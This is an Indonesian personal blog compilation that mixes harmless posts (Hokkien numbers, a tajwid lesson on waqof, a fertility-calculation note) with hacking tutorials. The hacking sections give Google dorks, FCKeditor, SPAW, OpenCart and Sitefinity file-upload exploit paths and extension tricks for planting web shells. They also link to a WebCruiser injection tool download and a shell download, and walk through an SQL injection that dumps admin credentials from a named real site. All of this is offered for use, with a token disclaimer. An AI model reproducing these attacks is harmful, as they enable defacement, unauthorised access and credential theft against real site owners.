بسم الله الرحمن الرحيم

Belajar Bahasa Hokien

Mungkin kalau kita mendengar kata CEPEK, GOPEK,PEKGO, GOBAN terdengar familiar tapi untuk angka-angka selain itu mungkin agak membingungkan.
Sebenarnya angka-angka tersebut adalah Bahasa Hokien (Tionghoa) namun beberapa kata telah diadopsi oleh masyarakat Betawi dan Jakarta pada umumnya.TapI tidak semua angka diadopsi sehingga ada angka masih asing di telinga kita
Maka dalam tulisan ini kita coba bahas satu per satu angka tersebut sehingga dapat di jadikan referensi bagi kita semua.
Apabila ada kesalahan penyebutan angka saya minta maaf karena pribadi, saya bukan keturunan Tionghoa namun banyak bergaul dengan saudara-saudara kita di Glodok :)
Angka yang paling terkenal adalah
2 3 4 = Jie Sam Soe
Adalah salah satu merek rokok kretek yang sangat terkenal
ANGKA DALAM BAHASA HOKIEN
1 = it
2 = Ji/No (spesial untuk ratusan/ribuan/puluh ribuan/jutaan)
3 = sa
4 = si
5 = go
6 = lak
7 = cit
8 = pek
9 = kau
10= cap
11 = cap it
12 = cap ji
13 = cap sa
14 = cap si
15 = cap go
16 = cap lak
17 = cap cit
18 = cap pek
19 = cap kau
20 = ji cap
21 = ji cap it
22 = ji cap ji
23 = ji cap sa
24 = Ji cap si
25 = ji go
50 = go cap
60 = lak cap
70 = cit cap
80 = pek cap
90 = kau cap
Dulu masih ada 25/50 perak (rupiah) = tun
Rp 5 = go tun
R0 10 = cap tun
Rp 25 = ji go tun
Rp 50 = go cap tun
Rp 100 = ce pek tun
RATUS = Pek
100 = Ce pek
150 = pek go
200 = no pek
250 = no pek go
300 = sa pek
400 = si pek
500 = go pek
600 = lak pek
700 = cit pek
800 = pek pa tun
900 = kau pek
RIBUAN = Ceng
1000 = seceng, secengan = ribuan
1500 = ceng go
2000 = no ceng
2500 = no ceng go
3000 = sa ceng
4000 = si ceng
5000 = go ceng
6000 = lak ceng
7000 = cit ceng
8000 = pek ceng
9000 = kau ceng
10 ribu = ceban, 10.000an = cebanan
15 ribu = ban go
20 ribu = no ban
25 ribu = no ban go
30 ribu = sa ban
35 ribu = sa ban go
40 ribu = si ban
45 ribu = si ban go
50 ribu = go ban
60 ribu = lak ban
70 ribu = cit ban
80 ribu = pek ban
90 ribu = kau pan
100 rb = ce pek ceng
125 rb = pek ji go (umumnya org ngerti itu u/ 125 ribu)
110 ribu = pek it
120 ribu = pek ji
130 rbiu = pek sa
140 ribu = pek si
150 ribu = pek go
160 ribu = pek lak
170 ribu = pek cit
180 ribu = pak pek
190 ribu = pek kau
200 rb = nopek ceng
250 rb = nopek go
300 rb = sa pek ceng
350 rb = sa pek go
400 rb = si pek ceng
500 rb = go pek ceng
600 rb = lak pek ceng
700 rb = cit pek ceng
800 rb = pek pak ceng
900 rb = kau pek ceng
JUTA = Tiao
1 juta = ce tiao
1.1 juta = tiao it
1.2 juta = tiao ji
1.3 juta = tiao sa
1.4 juta = tiao si
1.5 juta = tiao puah = sejuta setengah
1.6 juta = tiao lak
1.7 juta = tiao cit
1.8 juta = tiao pek
1.9 juta = tiao kau
2 juta = no tiao
2.1 juta = no tiao it
2.2 juta = no tiao ji
2.3 juta = no tiao sa
2.5 juta = no tiao puah
3 juta = sa tiao
4 juta = si tiao
5 juta = go tiao
6 juta = lak tiao
7 juta = cit tiao
8 juta = pek tiao
9 juta = kau tiao
10 juta = cap tiao
dst … + tiao
50 juta = go cap tiao
100 juta = cepek tiao
500 juta = gopek tiao
TEST:
Untuk menguji kemampuan anda akan angka-angka di atas anda dapat melakukan hal berikut.
Isi titik sesuai dengan ingatan anda.
1. CENG GO = …..?
2. SA TIAO POAH = …….?
3. SE CENG = …..?
4. JI GO TUN = ….?
5. LAK PEK TIAO =…..?
6. NO CENG GO = …..?
7. GO BAN = ….?
8. BAN GO = ….?
9. PEK JI GO = ….?
10. LAK BAN = ….?
JAWABAN :
1. CENG GO = 1500
2. SA TIAO POAH = 3 Juta Setengah
3. SE CENG = Seribu
4. JI GO TUN = 25 perak
5. LAK PEK TIAO = 600 juta
6. NO CENG GO = 2500
7. GO BAN = 50 ribu
8. BAN GO = 15 ribu
9. PEK JI GO = 125 ribu
10. LAK BAN = 60 ribu
Tips jawaban : Sorot semua pertanyaan 1 s.d 10 anda akan menemukan jawabannya
Kalau anda bisa menjawab minimal 7 pertanyaan dengan betul, boleh juga jadi PENJAGA TOKO DI GLODOK …… :)

Cara mencari kelemahan website/situs

Dengan begitu berkembangnya internet dewasa ini, situs web yang bermunculan tiap hari, begitu pula dengan virus dll. Bagi yang hobby mengutak atik website tentunya tidak asing lagi dengan istilah security untuk website/situs, mulai dari istilah sql injections dan lain sebagainya.
Kali ini saya akan berbagi tools untuk menguji dan mencari kelemahan website/situs, WebCruiser Web Vulnerability Scanner Enterprise v2.5.0, adalah sebuah perangkat lunak yang khusus dirancang untuk tujuan ini.

WebCruiser Web Vulnerability Scanner adalah sebuah perangkat lunak penetrasi web yang efektif dan kuat yang akan membantu kita dalam mengaudit website/situs, juga memiliki scanner kerentanan dan sengkaian alat keamanan.
Mendukung pemindaian situs POC (Proof of concept) kerentanan situs seperti: SQL Injection, Cross Site Scripting, XPath Injection dll. juga, WebCruiser juga adalah sebuah alat SQL injection otomatis, XPath injection tool, dan Cross Site Scripting tool!
Apa itu WebCruiser?, WebCruiser adalah alat untuk:

  • SQL Injection Tool pertama untuk Windows 7, Windows Vista
  • Web Vulnerability Scanner
  • SQL Injection Scanner
  • Cross Site Scripting Scanner
  • XPath Injection Scanner
  • Automatic SQL Injection Tool (POC)
  • Cross Site Scripting Tool (POC)
  • XPath Injection Tool (POC)
  • Post Data Resend Tool
Fitur Webcruiser:
  • Crawler(Site Directori dan File)
  • Vulnerability Scanner: SQL Injection, Cross Site Scripting, XPath Injection dll.
  • SQL Injection Scanner
  • SQL Injection Tool: GET/Post/Cookie Injection POC(Proof of Concept)
  • SQL Injection for SQL Server: PlainText/Union/Blind Injection
  • SQL Injection for MySQL: PlainText/Union/Blind Injection
  • SQL Injection for Oracle: PlainText/Union/Blind/CrossSite Injection
  • SQL Injection for DB2: Union/Blind Injection
  • SQL Injection for Access: Union/Blind Injection
  • Post Data Resend
  • Cross Site Scripting Scanner and POC
  • XPath Injection Scanner and POC
  • Auto Get Cookie From Web Browser For Authentication
  • Report Output.
Download WebCruiser Web Vulnerability Scanner Enterprise v2.5.0

Belajar Deface dengan Mudah


Pendahuluan :
Apa itu deface?
deface : melakukan perubahan pada halaman web pada situs-situs tertentu, yang dilakukan oleh para hacker atau team tertentu dengan gerakan undergroundnya sebagai sebuah cyber gang fight untuk mengganggu informasi yang dimunculkan pada halaman situs yang dimaksud.

Ada banyak cara untuk nge deface web
but karna saya masih newbie.. saya masih dekit tau nya

maaf sebelumnya kalo ini ga berguna..
hanya memberikan apa yang saya tau kepada teman² semua

OK kali ini saya akan memberikan tutor deface singkat
ada dua.. 1 upload *.html dan 1 lgi upload *.txt
jamin 1 jam dapet min 10 site

OK langsung aja..
================================================
Autor : fanglisinaulan
email : fanglisinaulan@outlook.com
site : hackerisnotcrme
forum : kaskus.co.id
title : CubeCart v 3.x Upload file Vulnerability
dork : powered by CubeCart v 3.x
================================================


[+] exploit : http://localhost/[pacth]/admin/includes/rte/editor/filemanager/browser/default/connectors/test.html

Ok langsung aja yah..
sesuai judul CubeCart Upload file


buka google
masukkan dork.. terserah mau gimana caranya
salah satu nya adalah
intext:'powered by CubeCart v 3.x'

cari satu per satu,,
nah, kalo udah dapet target kito coba masukin exploit
ne hasil nya


Sepp, bisa..
Kita coba upload file *.html


1.pada connector pilih PHP
2.lalu pilih file html yang udah kita siapin.. trz klik Upload


Nah tandanya berhasil ato tidah uploadtan kita gini
Lihat SS berikut
file uploaded with no errors



OK, udah berhasil di upload.. tapi file kita dimana ya?
Langsung klik Get folder and files

Kurang lebih seperti ini

Code:
<Connector command="GetFoldersAndFiles" resourceType="File">

<CurrentFolder path="/" url="/[pacth]/file/"/>

−

<Folders>

<Folder name="test"/>

</Folders>

−

<Files>

<File name="a_asp;_jpg(1).gif" size="53"/>

<File name="a_asp;_jpg.gif" size="53"/>

<File name="fe.php6" size="188"/>

<File name="robtz.html" size="18"/>

<File name="fe.php?" size="188"/>

<File name="fe_php." size="188"/>

<File name="hn(1).txt" size="1"/>

<File name="hn.txt" size="1"/>

<File name="r57.php~" size="108"/>

</Files>

</Connector>



Dari data di atas kita bisa lihat file kita ada di “url/[pacth]/file/robtz.html”
Example : http://site.gov.my/fileupload/file/robtz.html

bakal keliatan seperti SS berikut..


Nah sekarang coba buka di halamna baru url tadi..
Itu lah halaman file yang kita upload tadi



seep..
kita berhasil masukin file deface an..
untuk shell sepertinya bisa dengan menyisipkan script ke dalam file tertentu seperti sudah pernah di jelaskan kk Alecs..

gimana? gampang bukan?
heheheh

=====================================
mau yang lebih gampang lagi?
OK boleh..
ne saya kasih..lagi..




Tutorial singkat deface with *.txt

================================================
Autor : fanglisinaulan
email : fanglisinaulan@outlook.com
site : hackerisnotcrme
forum : kaskus.co.id
title : upload *.txt file Vulnerability
dork : filemanager/connectors
================================================

[+] exploit
http://site/[patch]/fckeditor/editor/filemanager/connectors/test.html

OK kali ini saya akan memberikan tutorial deface paling gampang yang baru saya temukan
Sebenranya banyak cara deface.. apa lagi php nuke sangat banyak bug nya
Ga ada SS karma ini sangat gampang.. 

€œJust Deface

=======================
[+] langkah pertama [+]
=======================

Langkah pertama yang hasrus kita lakukan seperti biasa juga..
Nnya dulu sama si google
Dork..
Inurl:Masukin dork
Inurl: fckeditor/editor/
Inurl:filemanager/connectors/ site:.my
inurl:connectors/uploadtest.html site:.my :P

udah blom?
Heheh
OK seep.. lanjut..
Buka site nya..

Kali ini saya coba site
http://www.slfc.net.cn

=======================
[+] langkah ke dua [+]
=======================

OK lanjut..
Masukin exploitnya
Jadinya kayak gini
http://www.slfc.net.cn/php/FCKeditor...tors/test.html

SS

=======================
[+] langkah ke tiga [+]
=======================

Nah, kalo udah muncul yang kayak gitu udah pada tau kan..?
Sama seperti tutor ecommerce
OK, pilih php,,
Pilih file defacean kita
Upload..
Kalo keluar kotak dialog bertuliskan “file uploade with no errors” berrti berhasil

========================
[+] langkah ke empat [+]
========================
Cari file uploadtan kita..
Klik get folder and files..

untuk contoh ini ada di
"/php/userfiles/file/"
jadinya
demo: http://localshost/php/userfiles/file/[file kamu]
ex : http://www.slfc.net.cn/php/userfiles/file/hn.txt
Nah.. sekarang lihat url file kita tadi,, seep..
But just deface..

No shell!
html juga ga bisa
hehhe kalo mau yang shel bisa pake ini..
out side : tutor deface joomla wiht shell



NB: Mungkin ini masih bisa di kembangkkan lagi.. untuk upload shell dengan memanipulasi file.. tapi saya belum berhasil karna saya masih newbie

--- ۩۩۩۩ Cara deface website for newbie ۩۩۩۩---

1. Deface menggunakan ASPX
DORK :
inurl:Fck/fcklinkgallery.aspx
atau
/portals/0/
inurl:tabid/176/Default.aspx

pilih salah satu dork nya,,

klo udah ketemu target nya tambahkan ini "providers/htmleditorproviders/fck/fcklinkgallery.aspx

di sini sya menggunakan dork inurl:Fck/fcklinkgallery.aspx dan target http://www.pivocom.com/ sebagai contohnya..

sehingga akan menjadi seperti ini :
"http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx"

setelah nge klik itu, tnggu loading selesai baru kamu harus klik
"(File A file on your site)
dang anti alamat protocol website nya jadi :
"javascript:__doPostBack('ctlURL$cmdUpload','' )" => [ tanpa tanda kutip 2 ]

ntar keluar sendiri tuh, tombol browse ny kya gini..

klo udah upload file yang pgn kamu masukin,,
file yang bisa di upload antara lain:

*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
klo gk punya shell nya download aja di sini http://www.media*fire..com/?zqvx2ajbyc4b17j
tapi gk smua web yang bisa upload file .html,
ada bbrapa situs yg hanya bisa upload file .txt

sebelum upload ubah ekstensi nya menjadi css
misal : hacker.asp;.css ingat ! kita harus menambahkan titik nya dua kali [contohnamashell(.)asp(.)css] sehingga berakhiran ".asp;.css" misal : "hacker.asp;.css"

upload, trus ktia buka hasil deface nya . .
kita liat dlu tadi nama file yang kita upload apa
misal : "hacker.asp;.css" kita buka alamat protocol nya
caranya : ' kan tadi alamat nya "http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" [ dengan catatan setelah kita berhasil/ selesai upload ]

nah..abis itu kamu ganti alamat "http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" menjadi alamat halaman defaced kita menjadi http://www.pivocom.com/portals/0/pajenk.asp;.css intinya kita harus menambahkan "portals/0/" pada akhir http://www.pivocom.com/


2.Deface web dengan SPAW Vulnerably:

DORK
inurl:spaw2/dialogs/ atau
inurl:spaw2/uploads/files/

POC
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da752d9 8cac9
jika sudah menemukan targetnya contoh seperti ini :
http://olgabz.com/spaw2/dialogs/

lalu kamu ganti spaw2/dialogs/"
dengan
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da752d9 8cac9

jadinya kya gini http://olgabz.com/spaw2/dialogs/dial...a752d9%208cac9

nanti akan muncul SPAW File Manager,lihat gambar di bawah ini :
Spoilerfor liat gan:


jangan lupa ganti type nya dari image ke File,dan kamu tinggal upload file kamu..
jika sudah trus di apain...??
yaudah selesai emang mau ngapain ??? heheheh
kidding,,

trus kamu lihat file kamu sudah masuk blom seperti gambar di bawah ini:



lalu bagaimana cara melihat hasil deface kita???
cara nya,kamu klick file yg sudah kamu upload,nanti akan ada tulisan download file di sebelah kanan,,dan kamu klick,,maka hasil file deface kamu akan keluar seperti ini..

ni hasilnya http://olgabz.com/spaw2/uploads/files/pajenk.html

udah dehh selesai deface nya,,gampang kan ???

3.deface dengan metode opencart:

maaf ini khusu bwat newbi yg ingin blajar,,klo udah master mohon bimbingannya ..
seperti biasa nyarinya lewat paman google

dork nya :
SUPORT BY OPENCART
atau
Powered By OpenCart site:com (site nya bisa kamu ganti,seperti my,il, dll yang penting suport opencart)
klo pengen smuanya,site nya ilangin jadi gini aja Powered By OpenCart

langsung ke caranya,,
jika kamu sudah mendapatkan target nya

contoh target http://www.digitalbazzar.co.uk/shop bisa juga www.digitalbazzar.co.uk/cart,
www.digitalbazzar.co.uk/patch dll

klo udah dapet targetnya tinggal kita inject exploitnya
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

jadinya kya gini http://www.digitalbazzar.co.uk/shop/...tors/test.html
klo ketemu yang kya gini http://digitalbazzar.co.uk/shop/ kamu inject di blakang /shop/ nya..


maka akan muncul tampilan seperti ini..



jangan lupa connectornya di ganti jadi PHP.
lalu kamu masukin file deface kamu,jika berhasil maka ada bacaan alert seperti ini "file uploaded with no errors"

untuk melihat apakan berhasil di upload atau tidak kamu ke "Get Folders and Files" dan lihat hasilnya... :P

jika berhasil kamu tinggal masukin nama file deface kamu di blakang site nya,,
maka hasilnya seperti ini..
http://www.digitalbazzar.co.uk/

4.Patch Bug CMS Lokomedia: 

contoh lihat
DORK=
inurl:"admin/foto_berita/"
inurl:"media.php?module="
allinurl:/media.php?module=berita


pilih salah satu aja ..

path :
/admin/content.php?module=user

PATCH
untuk memperbaiki bugs pada CMS Lokomedia bisa dengan memberikan Patch pada file /admin/content.php
dengan menambahkan penggalan kode berikut :
session_start();
if (empty($_SESSION[namauser]) AND empty($_SESSION[passuser])){
echo "Maaf anda tidak berhak menjalankan modul ini";
}
else{
.....Statement
}


Menambahkan penggalan kode yang sama di file /admin/aksi.php

session_start();
if (empty($_SESSION[namauser]) AND empty($_SESSION[passuser])){
echo "Maaf anda tidak berhak menjalankan modul ini";
}
else{
.....Statement
}

menyaring file yang akan di upload kode pada file aksi.php saat mengedit berita dengan penggalan kode berikut:


if ($tipe_file != "image/jpeg" AND $tipe_file != "image/pjpeg"){
echo "Gagal menyimpan data !!!
Tipe file $nama_file : $tipe_file
Tipe file yang diperbolehkan adalah : JPG/JPEG.
";
echo "Ulangi Lagi";
}
else{
.....statement
}
sumber

buku Jalan Pintas Menjadi Master PHP karangan Lukmanul Hakim.

 5.CMS Balitbang 3.42:

Hasilnya ..
http://smpn4pakem.sch.id//userfiles/pajenk.txt

dorknya
Code:
inurl:/html/siswa.php?

inurl:/html/alumni.php?

inurl:/html/guru.php?


Exploit :
Code:
http://public_html/dir/editor/filemanager/connectors/uploadtest.html

http://public_html/dir/editor/filemanager/connectors/test.html

http://public_html/dir/editor/filemanager/browser/default/browser.html

pilih salah satu aja ...
klo udah milih target masukin exploitnya
contoh :
Code:
 http://smpn4pakem.sch.id/editor/filemanager/connectors/uploadtest.html


lalu pilih connector nya dari ASP --> PHP,,tinggal masukin filenya agan deh...tapi berbentuk .TXT yah,,,

6.Sitefinity CMS (ASP.NET) Shell Upload Vulnerability

Dork : "Sitefinity: Login"
Exploit : UserControls/Dialogs/ImageEditorDialog.aspx

pertama kamu cari dlu target webnya dengan dork nya.,,
jika target sudah ketemu,masukan exploitnya..
contoh target http://www.hoac-bsa.org/sitefinity/
tambahkan exploitnya sehingga menjadi seperti ini
Code:
http://www.hoac-bsa.org/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx


jika sudah kya tampilan di atas maka sekarang tinggak kita upload shellnya,..contoh : (namashell.asp;.jpg) atau (namashell.asp;.gif)


jika sudah terupload,maka cara untuk menampilkan shell punya kita dengan mengklik "view original size"..
maka hasilnya seperti ini http://www.hoac-bsa.org/Images/pajenk.asp;.jpg
cukup simple bukan .. ???
langsung coba dah gan gk perlu pake bengong ..


7.powered by zoopeer
seperti biasa kita mendeface dengan menggunakan dork biar lebih mudah ..
 hampir sama kya opencart lah ..

Quote:
dork nya powered by zoopeer

Quote: exploit fck/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

 caranya : Buka google lalu tuliskan powered by zoopeer, jika sudah ada target
contoh :

http://seifico.com/

 kita masukan exploitnya,yg akan kita injeksi jadi seperti ini :
 
 http://seifico.com/fck/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

 klo udah berhasil exploitnya,saatnya kita upload file deface an kita,,
udah pada tau kan ..
jika sudah upload filenya ,ganti code ini

 fck/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php 

menjadi

images/File/namashell.html hasilnya http://seifico.com/images/File/pajenk.html 

gampang banget kan ..

Hacking : Dengan Menggunakan Sql Injection

Hello all, DI sini saya mau sharing Ilmu dikit mengenai Hacking Sql Injection Dengan Menggunakan Metode Schema fuzzy

Khusus buat Para Newbie Yang pengen belajar,,, jadi buat para master yang udah jago di liat2 aja dech....
Mungkin masih banyak kekurangan dalam Thread ini, untuk itu ayo kita sama sama belajar...

Langsung Masuk Ke pembahasanx yachh :

Schema Fuzzy adalah tools yang di buat dengan bahasa python yang dipergunakan untuk melakukan test SQL Injection pada sebuah website...


feature dan hal2 yang di butuhkan yaitu :

1. Komputer (fast speed)
2. Koneksi internet (fast connection)
3. Program Python-2.6.4 (bisa di download Di Sini !! Setelah Di download Langsung Di install di PC/Laptop anda)
4. script schemafuzzy.py (adalah script yang akan di gunakan untuk mencari database,column and table ,, Untuk download scriptsx Klik Di Sini !!)
5. CMD
6. target website (misal menggunakan kata kunci di google : "products.php?cat=")

Sudah Di siapkan?
di pastikan Kamu sudah install python2.6.4. Copy schemafuzz.py ke dalam dir python26. Kalo sudah selesai langsung jalankan. Caranya :

klik start>>Run>>CMD
truss and aktif ke directory c:\ dengan mengetik CD ../.. <-- 2="" br="" dir="" mundur="">
masuk ke directory Python26 dengan cara ketik "cd Python26" hingga muncul
C:\Python26>



perintah dasar schemafuzzy ini yaitu :

schemafuzzy.py -u "target" --perintah
1. kita gunakan di target kita. (disini saya ambil target yang saya dapatkan di google dengan kata kunci : "products.php?cat=") yaitu :

http://www.queenannewine.com/products.php?cat=1

2. Cek kolomnya

python schemafuzzy.py -u http://www.queenannewine.com/products.php?cat=1 --findcol

Hingga muncul :



3. setelah ini kamu masuk ke direktory c:\ di mana python terinstall cari name file schemafuzzlog.txt <-- ada="" berhasil="" br="" cari="" column="" di="" hasil="" sini="" tadi....="" yang="">



3. Cari Db nya..

python schemafuzz.py -u "http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi,2,3" -dbs

Hingga Muncul :



Kita sudah temukan data base site tersebut :
database ada 3 :

1. C239128_QAWcal
2. C239128_queen
3. C239128_queen2

tapi pada penjesalan ini kita akan gunakan database nomor2

4. Cari nama table dalam database C239128_queen

python schemafuzz.py -u "http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi,2,3" --schema -D C239128_queen

Hingga Muncul Hasil :



keluar semua colomnya... dari sini kita mengetahui bahwa web tersebut memiliki 56 Columns. (pic di atas pencarian Blom selesai, jadi kalian kalian harus selesaikan sampai column 56) Sekarang kita tinggal pilih kolom yang akan kita exploit ....

5. Exploit Tables and Columns :

python schemafuzz.py -u "http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi,2,3" --dump -D C239128_queen -T - di isi Nama table -C di isi nama columns..

Misal gua mau Melihat data data yang ada di columns admin :

Dengan perintah :

python schemafuzz.py -u "http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi,2,3" --dump -D C239128_queen -T admin -C adminUser,adminPassword


Hingga Muncul Hasil seperti di bawah ini :




Lihat
jbalji:mcse6273:mcse6273:

ini adalah user dan password admin yang keluar.. . Cara ini hanya berlaku untuk sql versi 5. untuk versi 4, Harus Manual.

Nah user and password admin dah ketahuan... untuk login ke adminx.. silahkan anda cari sendiri link loginx....


oke sekian dari saya (ihmmank).

segala penyalah gunaan dari artikel ini bukan Tanggung jawab penulis.

Semoga bermanfaat bagi anda.

Nb: Jangan di buat untuk ke jahatan yach...

باب الوقف (BAB WAQOF)

I.        Pengertian
Waqof artinya : tempat pemberhentian.
Waqof adalah tempat berhentinya bacaan Al-Qur’an yang berada di tengah ayat maupun di akhir ayat. Biasanya digunakan untuk mengatur pernafasan si Qira’at (pembaca), dapat pula digunakan untuk menyambung bacaan dari ayat yang satu ke ayat yang lainnya (menyambung kalimat yang dipenggal oleh ayat). Biasanya berpengaruh pula terhadap tafsir dari suatu ayat tersebut.

II.      Macam-macam Waqof
a.      Waqof Lazim ( لازم )
Lazim artinya suatu yang dilarang.
Waqof Al-Mamnu’ adalah apabila terdapat tanda waqof لا di tengah atau di akhir ayat, maka dilarang untuk berhenti walaupun hanya sejenak.

Belajar Ilmu Tajwid : Waqof

Akhirnya kita belajar tentang Waqof (pemberhentian). Adapun yang akan kita bahas disini adalah macam macam waqof dan tanda tandanya.

A. Macam Macam Waqof
1. Tamm (sempurna)
الوقف التام
Yaitu waqof yang dilakukan pada suatu kata dalam suatu bacaan al-qur’an sedangkan kata tersebut tidak ada hubungannya dengan kata yang selanjutnya.
Contohnya dalam surat Al-Baqoroh ayat 7
وَلَهُمْ عَذَابٌ عَظِيْمٌ . وَ مِنَ النَّاسِ …

2. Hasan (baik)
الوقف الحسن
Yaitu waqof yang dilakukan pada suatu kata dalam suatu bacaan al-qur’an tetapi kata tersebut ada hubungannya dengan kata yang selanjutnya.
Contohnya dalam surat Al-Fatihah ayat 7
أَنْعَمْتَ عَلَيْهِمْ . غَيْرِ الْمَغْضُوْبِ …

Percobaan pertama posting menggunakan email

Kemarin saya mendapatkan info bahwa posting blogger sekarang bisa
dilakukan melalui email.

Sekarang saya akan coba dahulu. Semoga berhasil.

Cara Menghitung Masa Subur

Saya adalah pasangan suami istri muda, dan tentu saja sangat memerlukan pengetahuan mengenai perhitungan masa subur istri. Setelah google di beberapa website memang ada beberapa metode perhitungan yang berbeda. Namun hasilnya tidak berbeda jauh. 

Dan kemudian saja juga mencoba untuk membeli alat bantu test kesuburan yang bernama FERTITEST yang dijual bebas di apotik-apotik dengan harga sekitar 22ribuan. Di dalam petunjuk pemakaian FERTITEST tersebut juga tertulis bagaimana melakukan perhitungan masa subur. Disini saya coba hadirkan bagaimana daftar masa subur dimulai menurut FERTITEST  tersebut.
Semoga bermanfaat.